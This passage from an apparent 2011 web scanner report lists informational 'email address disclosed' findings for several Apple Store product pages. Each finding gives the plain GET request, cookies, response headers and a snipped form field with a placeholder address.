Cookie: dfa_cookie=appleglobal%2Capplehome; s_pathLength=homepage%3D1%2C; geo=US; s_sq=%5B%5BB%5D%5D; s_ppv=100%2C100%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; s_invisit_us=homepage%3Dtrue%3B; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=apple%20-%20index%20(US);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 17:48:35 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 17:59:19 GMT
content-type: text/html; charset=UTF-8; encoding=UTF8
ETag: "4f76d3e348e502028903d8a9792bad66"
Vary: accept-encoding
Date: Thu, 03 Feb 2011 17:49:19 GMT
x-request-id: b8af32bb-1028-4ec7-8cc1-beb8dd437452
Content-Length: 80376
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />

<title>iPod Universal Dock Adapter 3-Pack for iPod touch (4th generation) - Ap
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.63. http://store.apple.com/us/product/MC838  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/MC838

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/MC838 HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome; s_pathLength=homepage%3D1%2C; geo=US; s_sq=%5B%5BB%5D%5D; s_ppv=100%2C100%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; s_invisit_us=homepage%3Dtrue%3B; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=apple%20-%20index%20(US);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 17:48:32 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 17:59:06 GMT
ETag: "1da417def0be3aa5fbd1ade571f532c8"
Vary: accept-encoding
content-type: text/html; charset=UTF-8; encoding=UTF8
Date: Thu, 03 Feb 2011 17:49:06 GMT
x-request-id: e7520110-007a-40a6-935f-22a0ac839600
Content-Length: 82558
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />


<title>Apple HDMI to HDMI Cable (1.8 m) - Apple Store (U.S.)</title
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.64. http://store.apple.com/us/product/MC917ZM/A  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/MC917ZM/A

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/MC917ZM/A HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 17:57:01 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:18:56 GMT
ETag: "62ab4312e3ffc434b877a353ad5d18f2"
Vary: accept-encoding
content-type: text/html; charset=UTF-8; encoding=UTF8
Date: Thu, 03 Feb 2011 18:08:56 GMT
x-request-id: bf6df6ca-a784-4c64-9afb-fd1226ba214b
Content-Length: 67199
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />

<title>Apple Component AV Cable - Apple Store (U.S.)</title>

<meta http-equiv
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.65. http://store.apple.com/us/product/TP676ZM/A  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/TP676ZM/A

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/TP676ZM/A HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 18:06:27 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:18:09 GMT
content-type: text/html; charset=UTF-8; encoding=UTF8
ETag: "3b3703fe41902b4826cd69ac3d445da2"
Vary: accept-encoding
Date: Thu, 03 Feb 2011 18:08:09 GMT
x-request-id: 9d207e91-c962-4a85-aff3-6115763aa88a
Content-Length: 103329
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />


<title>Sennheiser PXC 450 Travel Headphones - Apple Store (U.S.)</t
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.66. http://store.apple.com/us/product/TS232LL/A  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/TS232LL/A

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/TS232LL/A HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 18:06:15 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:18:12 GMT
ETag: "8a8e04ff9cbec3448007ef703cb1cbc4"
Vary: accept-encoding
content-type: text/html; charset=UTF-8; encoding=UTF8
Date: Thu, 03 Feb 2011 18:08:12 GMT
x-request-id: 00073d25-8664-467f-8770-2c89d8376fcc
Content-Length: 105993
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />


<title>Beats by Dr. Dre Headphones from Monster - Apple Store (U.S.
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.67. http://store.apple.com/us/product/TS504  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/TS504

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/TS504 HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 18:06:14 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:17:46 GMT
content-type: text/html; charset=UTF-8; encoding=UTF8
Vary: accept-encoding
Date: Thu, 03 Feb 2011 18:07:46 GMT
x-request-id: dc7c68f3-7847-4125-9d2b-d952c2a11b38
ETag: "dc7a4ef7c55dc4aadc53f65231ee481d"
Content-Length: 86276
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />


<title>Power Support Anti-Glare Film Set for iPhone 3G - Apple Stor
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.68. http://store.apple.com/us/product/TS836  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/TS836

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/TS836 HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 18:06:11 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:17:41 GMT
ETag: "0c8099f8a27b530fa6cecaac2b7250ce"
Vary: accept-encoding
content-type: text/html; charset=UTF-8; encoding=UTF8
Date: Thu, 03 Feb 2011 18:07:41 GMT
x-request-id: 69b67742-5404-4bac-b16a-27bf08a4a584
Content-Length: 108877
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />


<title>Bose.. SoundDock.. Series II Digital Music System - Apple St
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.69. http://store.apple.com/us/product/TS901LL/A  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/TS901LL/A

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/TS901LL/A HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 18:06:54 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:18:38 GMT
ETag: "201c0e6b3a14b71746a6cd6e7d5db5fb"
Vary: accept-encoding
content-type: text/html; charset=UTF-8; encoding=UTF8
Date: Thu, 03 Feb 2011 18:08:38 GMT
x-request-id: eae5edd7-2b1a-4760-8263-bcb48d25dfa4
Content-Length: 85934
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />


<title>Monster iCarPlay Wireless 250 FM Transmitter with AutoScan -
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.70. http://store.apple.com/us/product/TV027VC/A  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/TV027VC/A

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/TV027VC/A HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
